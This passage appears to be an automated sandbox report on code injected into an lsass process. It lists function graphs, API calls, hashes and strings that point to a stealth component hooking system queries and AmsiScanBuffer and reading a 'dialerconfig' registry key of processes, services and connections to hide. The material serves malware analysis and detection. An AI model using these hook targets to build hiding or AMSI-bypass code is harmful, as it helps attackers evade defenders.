                                                          • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction ID: 44f190ebc50ea03d88713292795647823baa496bc22053f10ad1d2e118dfbcda
                                                          • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction Fuzzy Hash: 9231D4E1610E059AFF529F36F5DD36922A5BB84BC0F0450679E0F97E95EE1CCC518350

                                                          Non-executed Functions

                                                          Function 000002D6F1512BF4 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 323 2d6f1512bf4-2d6f1512c6d 325 2d6f1512f88-2d6f1512fab 323->325 326 2d6f1512c73-2d6f1512c79 323->326 326->325 327 2d6f1512c7f-2d6f1512c82 326->327 327->325 328 2d6f1512c88-2d6f1512c8b 327->328 328->325 329 2d6f1512c91-2d6f1512ca1 GetModuleHandleA 328->329 330 2d6f1512ca3-2d6f1512cb3 GetProcAddress 329->330 331 2d6f1512cb5 329->331 332 2d6f1512cb8-2d6f1512cd6 330->332 331->332 332->325 334 2d6f1512cdc-2d6f1512cfb StrCmpNIW 332->334 334->325 335 2d6f1512d01-2d6f1512d05 334->335 335->325 336 2d6f1512d0b-2d6f1512d15 335->336 336->325 337 2d6f1512d1b-2d6f1512d22 336->337 337->325 338 2d6f1512d28-2d6f1512d3b 337->338 339 2d6f1512d4b 338->339 340 2d6f1512d3d-2d6f1512d49 338->340 341 2d6f1512d4e-2d6f1512d52 339->341 340->341 342 2d6f1512d62 341->342 343 2d6f1512d54-2d6f1512d60 341->343 344 2d6f1512d65-2d6f1512d6f 342->344 343->344 345 2d6f1512e55-2d6f1512e59 344->345 346 2d6f1512d75-2d6f1512d78 344->346 349 2d6f1512f7a-2d6f1512f82 345->349 350 2d6f1512e5f-2d6f1512e62 345->350 347 2d6f1512d8a-2d6f1512d94 346->347 348 2d6f1512d7a-2d6f1512d87 call 2d6f1511934 346->348 352 2d6f1512d96-2d6f1512da3 347->352 353 2d6f1512dc8-2d6f1512dd2 347->353 348->347 349->325 349->338 354 2d6f1512e73-2d6f1512e7d 350->354 355 2d6f1512e64-2d6f1512e70 call 2d6f1511934 350->355 352->353 359 2d6f1512da5-2d6f1512db2 352->359 360 2d6f1512e02-2d6f1512e05 353->360 361 2d6f1512dd4-2d6f1512de1 353->361 356 2d6f1512ead-2d6f1512eb0 354->356 357 2d6f1512e7f-2d6f1512e8c 354->357 355->354 367 2d6f1512ebd-2d6f1512eca lstrlenW 356->367 368 2d6f1512eb2-2d6f1512ebb call 2d6f1511bc8 356->368 357->356 366 2d6f1512e8e-2d6f1512e9b 357->366 369 2d6f1512db5-2d6f1512dbb 359->369 364 2d6f1512e07-2d6f1512e11 call 2d6f1511bc8 360->364 365 2d6f1512e13-2d6f1512e20 lstrlenW 360->365 361->360 370 2d6f1512de3-2d6f1512df0 361->370 364->365 376 2d6f1512e4b-2d6f1512e50 364->376 373 2d6f1512e33-2d6f1512e45 call 2d6f1513c74 365->373 374 2d6f1512e22-2d6f1512e31 call 2d6f1511c00 365->374 372 2d6f1512e9e-2d6f1512ea4 366->372 378 2d6f1512edd-2d6f1512ee7 call 2d6f1513c74 367->378 379 2d6f1512ecc-2d6f1512edb call 2d6f1511c00 367->379 368->367 383 2d6f1512ef2-2d6f1512efd 368->383 369->376 377 2d6f1512dc1-2d6f1512dc6 369->377 380 2d6f1512df3-2d6f1512df9 370->380 382 2d6f1512ea6-2d6f1512eab 372->382 372->383 373->376 387 2d6f1512eea-2d6f1512eec 373->387 374->373 374->376 376->387 377->353 377->369 378->387 379->378 379->383 380->376 390 2d6f1512dfb-2d6f1512e00 380->390 382->356 382->372 392 2d6f1512eff-2d6f1512f03 383->392 393 2d6f1512f74-2d6f1512f78 383->393 387->349 387->383 390->360 390->380 397 2d6f1512f0b-2d6f1512f25 call 2d6f15189f0 392->397 398 2d6f1512f05-2d6f1512f09 392->398 393->349 399 2d6f1512f28-2d6f1512f2b 397->399 398->397 398->399 402 2d6f1512f2d-2d6f1512f4b call 2d6f15189f0 399->402 403 2d6f1512f4e-2d6f1512f51 399->403 402->403 403->393 405 2d6f1512f53-2d6f1512f71 call 2d6f15189f0 403->405 405->393
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                          • Instruction ID: dcd933d318de9fc5b8a688a743a1f8572ccd52ea406db3ee166873abffebb1ac
                                                          • Opcode Fuzzy Hash: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                          • Instruction Fuzzy Hash: 26B18EA2210E948AEB669F25F44D7A9A3A4F744BC4F64511BEE0E63F94DB3DCC81C740
                                                          Function 000002D6F15181C0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                          • Instruction ID: 7562c58f7faaf0b984c5202458afec4fdd28a687dc857cffa9d6136a4c55b39e
                                                          • Opcode Fuzzy Hash: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                          • Instruction Fuzzy Hash: EA311AB3205F808AEB619F61F8583ED7364F788788F44442ADA4E57A98DF3CCA48C710
                                                          Function 000002D6F151D6D4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                          • Instruction ID: 983a0a3fc5edacdfce01fe7f56abe7292d91a1dcaf254e42882d2e395cc53917
                                                          • Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                          • Instruction Fuzzy Hash: E7313A76214F808AEB619F25F84839E73A4F789798F540126EA9E53B99DF3CC945CB00
                                                          Function 000002D6F1511628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-2879589442
                                                          • Opcode ID: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                          • Instruction ID: 7dbd83f680d555f0e8a05f6407e5a9104c838bd5824e768260b09f9a20a43afb
                                                          • Opcode Fuzzy Hash: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                          • Instruction Fuzzy Hash: 7D7196A6710E918AEB119F76F89CA9923B4F784BC8F405112DE4E57F69EF2CC844C744
                                                          Function 000002D6F1511D40 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 000002D6F1511D4B
                                                            • Part of subcall function 000002D6F15120C4: GetModuleHandleA.KERNEL32(?,?,?,000002D6F1511D7D), ref: 000002D6F15120DC
                                                            • Part of subcall function 000002D6F15120C4: GetProcAddress.KERNEL32(?,?,?,000002D6F1511D7D), ref: 000002D6F15120ED
                                                            • Part of subcall function 000002D6F1515F60: GetCurrentThreadId.KERNEL32 ref: 000002D6F1515F9B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 4175298099-4225371247
                                                          • Opcode ID: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                          • Instruction ID: 01390cbd5a7a922a2e2bff300826dd9bbb3a3ff9ce58a082e6952bfbcc40631a
                                                          • Opcode Fuzzy Hash: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                          • Instruction Fuzzy Hash: 5641A1E5100D8AA8EA06EFA4F85E6D42362F7403C4FA0451B951F239B5EE7CCE4EC761
                                                          Function 000002D6F15112BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                          • Instruction ID: 63fde3cdae1c7709bce9cd44def21624c9ca46219b84b1ad8c47164ad88fefa6
                                                          • Opcode Fuzzy Hash: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                          • Instruction Fuzzy Hash: 4A5105B2604B848AEB55CF62F44C35AA7A1F788FD9F144126DE4A17B58DF7CD849CB00
                                                          Function 000002D6F14E6D40 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID: destructor'$ned$restrict(
                                                          • API String ID: 190073905-924718728
                                                          • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction ID: 39b8463a6b1aefa4131af0ce40a811fa63a0ce5cb70bcc8134708b22748181b3
                                                          • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction Fuzzy Hash: AA81C061600E418EFA60EB69F44D39966D0ABC57E0F444027AA1B47F9EEB3DCE468744
                                                          Function 000002D6F151D258 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 276 2d6f151d258-2d6f151d27a GetLastError 277 2d6f151d299-2d6f151d2a4 FlsSetValue 276->277 278 2d6f151d27c-2d6f151d287 FlsGetValue 276->278 281 2d6f151d2a6-2d6f151d2a9 277->281 282 2d6f151d2ab-2d6f151d2b0 277->282 279 2d6f151d289-2d6f151d291 278->279 280 2d6f151d293 278->280 283 2d6f151d305-2d6f151d310 SetLastError 279->283 280->277 281->283 284 2d6f151d2b5 call 2d6f151dafc 282->284 285 2d6f151d325-2d6f151d33b call 2d6f151cb78 283->285 286 2d6f151d312-2d6f151d324 283->286 287 2d6f151d2ba-2d6f151d2c6 284->287 300 2d6f151d358-2d6f151d363 FlsSetValue 285->300 301 2d6f151d33d-2d6f151d348 FlsGetValue 285->301 288 2d6f151d2d8-2d6f151d2e2 FlsSetValue 287->288 289 2d6f151d2c8-2d6f151d2cf FlsSetValue 287->289 292 2d6f151d2f6-2d6f151d300 call 2d6f151cfc4 call 2d6f151db74 288->292 293 2d6f151d2e4-2d6f151d2f4 FlsSetValue 288->293 291 2d6f151d2d1-2d6f151d2d6 call 2d6f151db74 289->291 291->281 292->283 293->291 305 2d6f151d3c8-2d6f151d3cf call 2d6f151cb78 300->305 306 2d6f151d365-2d6f151d36a 300->306 303 2d6f151d34a-2d6f151d34e 301->303 304 2d6f151d352 301->304 303->305 308 2d6f151d350 303->308 304->300 309 2d6f151d36f call 2d6f151dafc 306->309 311 2d6f151d3bf-2d6f151d3c7 308->311 312 2d6f151d374-2d6f151d380 309->312 313 2d6f151d392-2d6f151d39c FlsSetValue 312->313 314 2d6f151d382-2d6f151d389 FlsSetValue 312->314 316 2d6f151d3b0-2d6f151d3b8 call 2d6f151cfc4 313->316 317 2d6f151d39e-2d6f151d3ae FlsSetValue 313->317 315 2d6f151d38b-2d6f151d390 call 2d6f151db74 314->315 315->305 316->311 322 2d6f151d3ba call 2d6f151db74 316->322 317->315 322->311
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D267
                                                          • FlsGetValue.KERNEL32(?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D27C
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D29D
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D2CA
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D2DB
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D2EC
                                                          • SetLastError.KERNEL32(?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D307
                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D33D
                                                          • FlsSetValue.KERNEL32(?,?,00000001,000002D6F151F0FC,?,?,?,?,000002D6F151C3CF,?,?,?,?,?,000002D6F1517EE0), ref: 000002D6F151D35C
                                                            • Part of subcall function 000002D6F151DAFC: HeapAlloc.KERNEL32(?,?,00000000,000002D6F151D432,?,?,?,000002D6F151DAE5,?,?,?,?,000002D6F151DBA8), ref: 000002D6F151DB51
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D384
                                                            • Part of subcall function 000002D6F151DB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002D6F151643A), ref: 000002D6F151DB8A
                                                            • Part of subcall function 000002D6F151DB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002D6F151643A), ref: 000002D6F151DB94
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D395
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D3A6
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                          • String ID:
                                                          • API String ID: 570795689-0
                                                          • Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                          • Instruction ID: 59c76e7087845905331f5c9f2bf64267144371c9c505c38e9f152955b3b7a01b
                                                          • Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                          • Instruction Fuzzy Hash: 96415EE5301E844EFA5AAF32759E76D62429B457F0F540B27A93F27ED6DE6CDC028200
                                                          Function 000002D6F1512FAC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU user(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                          • Instruction ID: d2c53924e1538c41bb08355667a16be2805f83df9a9d61a4544346d1173b0a99
                                                          • Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                          • Instruction Fuzzy Hash: 753193A2A00E808AFB61CF22B81C759B3E0F798BE5F5445269E4E53E65DF3CD8568740
                                                          Function 000002D6F15130BC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU user(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                          • Instruction ID: fec11db0822d307948e4a7c1ba74c8d5261461f253cb747260e5761ca3857917
                                                          • Opcode Fuzzy Hash: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                          • Instruction Fuzzy Hash: 4C3159A2610F818AF791DF26B85C759A3A1B794FD5F1441269E8F53B24EF3CD8468700
                                                          Function 000002D6F14E9D74 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction ID: f656ef8e49960a6b74665e79ce9ccd3527a8fb3a4c77477665914186e18d97d4
                                                          • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction Fuzzy Hash: A8E15B72604B408EEB60DF69E44C39D7BA0F795BD8F104516EE8A97F99CB38CA91C710
                                                          Function 000002D6F151A974 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 439 2d6f151a974-2d6f151a9dc call 2d6f151b844 442 2d6f151a9e2-2d6f151a9e5 439->442 443 2d6f151ae43-2d6f151ae4b call 2d6f151cb78 439->443 442->443 444 2d6f151a9eb-2d6f151a9f1 442->444 446 2d6f151a9f7-2d6f151a9fb 444->446 447 2d6f151aac0-2d6f151aad2 444->447 446->447 451 2d6f151aa01-2d6f151aa0c 446->451 449 2d6f151aad8-2d6f151aadc 447->449 450 2d6f151ad93-2d6f151ad97 447->450 449->450 454 2d6f151aae2-2d6f151aaed 449->454 452 2d6f151ad99-2d6f151ada0 450->452 453 2d6f151add0-2d6f151adda call 2d6f1519a64 450->453 451->447 455 2d6f151aa12-2d6f151aa17 451->455 452->443 456 2d6f151ada6-2d6f151adcb call 2d6f151ae4c 452->456 453->443 466 2d6f151addc-2d6f151adfb call 2d6f1517d70 453->466 454->450 458 2d6f151aaf3-2d6f151aafa 454->458 455->447 459 2d6f151aa1d-2d6f151aa27 call 2d6f1519a64 455->459 456->453 462 2d6f151ab00-2d6f151ab37 call 2d6f1519e40 458->462 463 2d6f151acc4-2d6f151acd0 458->463 459->466 470 2d6f151aa2d-2d6f151aa58 call 2d6f1519a64 * 2 call 2d6f151a154 459->470 462->463 475 2d6f151ab3d-2d6f151ab45 462->475 463->453 467 2d6f151acd6-2d6f151acda 463->467 472 2d6f151acdc-2d6f151ace8 call 2d6f151a114 467->472 473 2d6f151acea-2d6f151acf2 467->473 507 2d6f151aa78-2d6f151aa82 call 2d6f1519a64 470->507 508 2d6f151aa5a-2d6f151aa5e 470->508 472->473 487 2d6f151ad0b-2d6f151ad13 472->487 473->453 474 2d6f151acf8-2d6f151ad05 call 2d6f1519ce4 473->474 474->453 474->487 480 2d6f151ab49-2d6f151ab7b 475->480 484 2d6f151acb7-2d6f151acbe 480->484 485 2d6f151ab81-2d6f151ab8c 480->485 484->463 484->480 485->484 488 2d6f151ab92-2d6f151abab 485->488 489 2d6f151ad19-2d6f151ad1d 487->489 490 2d6f151ae26-2d6f151ae42 call 2d6f1519a64 * 2 call 2d6f151cad8 487->490 492 2d6f151abb1-2d6f151abf6 call 2d6f151a128 * 2 488->492 493 2d6f151aca4-2d6f151aca9 488->493 494 2d6f151ad30 489->494 495 2d6f151ad1f-2d6f151ad2e call 2d6f151a114 489->495 490->443 520 